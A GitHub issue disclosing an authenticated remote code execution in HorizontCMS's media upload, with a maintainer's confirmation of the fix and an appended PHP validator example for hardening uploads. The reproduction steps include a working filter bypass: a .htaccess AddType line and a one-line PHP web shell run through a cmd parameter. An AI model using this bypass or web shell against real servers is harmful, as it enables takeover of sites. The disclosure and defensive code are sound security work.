Authenticated Remote Code Execution via a Media Files Upload (PHP Filetype Bypass) #30

Open
bigb0sss opened this issue Mar 15, 2021 · 2 comments


bigb0sss commented Mar 15, 2021

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution by uploading .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter can be bypassed by uploading arbitrary .htaccess and *.hello files in order to execute PHP code and gain RCE.

Reproduction of the Issue

  1. Log in to the admin panel (http:///admin/login)
  2. Go to "Media" --> "Files"
  3. Upload the following file --> Rename the file as ".htaccess":

         AddType application/x-httpd-php .hello

  4. Upload another file with the following content --> Rename the file as "test.hello":

         <?php system($_GET['cmd']); ?>

  5. Go to http://<HorizontCMS IP>/storage/test.hello?cmd= for RCE

Screenshots

  • Upload files and rename them: [screenshots 01 and 02]
  • Gain RCE: [screenshot]

Root Cause

  • The arbitrary file upload and rename functionality does not properly sanitize the file extension.

Recommendations

  • Rework the file upload function so that it always checks both the MIME type and the file extension
  • Avoid leaving the file upload folder ("/storage") open

Please let us know if you have any questions or need further information. Thanks!

Daniel Min & Chi Tran
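One way to implement the recommendations above, as an added example that is not HorizontCMS's own code: the validator rejects dotfiles such as .htaccess, enforces an extension allowlist, verifies that the file content matches the extension, and never lets the user pick the stored extension. The function name and the allowlist are assumptions.

```php
<?php
// Added example, not HorizontCMS code. Validates an uploaded file (or a
// rename target) before it lands in a web-served storage directory.

// Assumed allowlist: extension => acceptable content-sniffed MIME types.
const ALLOWED_UPLOADS = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
    'pdf'  => ['application/pdf'],
];

/**
 * Returns a server-generated filename to store, or throws on anything that
 * could change how the web server interprets the storage directory.
 * $filePath is the temporary upload (or the stored file being renamed).
 */
function validateUpload(string $filePath, string $requestedName): string
{
    // Only the basename: no path separators that could escape /storage.
    $name = basename($requestedName);

    // Dotfiles (.htaccess, .user.ini) reconfigure Apache/PHP for the whole
    // directory; more than one dot can hide a second extension.
    if ($name === '' || $name[0] === '.' || substr_count($name, '.') !== 1) {
        throw new RuntimeException("Rejected filename: $requestedName");
    }

    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_UPLOADS[$ext])) {
        throw new RuntimeException("Extension not allowed: $ext");
    }

    // Sniff the content; the client-supplied Content-Type header is untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($filePath);
    if ($mime === false || !in_array($mime, ALLOWED_UPLOADS[$ext], true)) {
        throw new RuntimeException("Content ($mime) does not match .$ext");
    }

    // Random name: the user never controls the stored extension, so a
    // later rename to ".htaccess" or "*.hello" is impossible by design.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}
```

Pair this with `AllowOverride None` in the Apache configuration for the storage directory so that any .htaccess that does reach it is ignored, and serve the directory with PHP execution disabled.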

@ttimot24 ttimot24 self-assigned this Mar 16, 2021
@bigb0sss bigb0sss changed the title Authenticated Remote Code Execution via a Media Files Upload (Filetype Bypass) Authenticated Remote Code Execution via a Media Files Upload (PHP Filetype Bypass) Mar 17, 2021
ttimot24 (Owner) commented May 23, 2021

Hi @bigb0sss,

This issue is addressed on the latest commit on master. The next release (1.0.0-beta.3) will contain this fix. Please mention this in your blogpost also.

Thank you!

bigb0sss (Author) commented

Hi @ttimot24,

Thanks for addressing the issue! We will update our blog post as well.

Thank you!
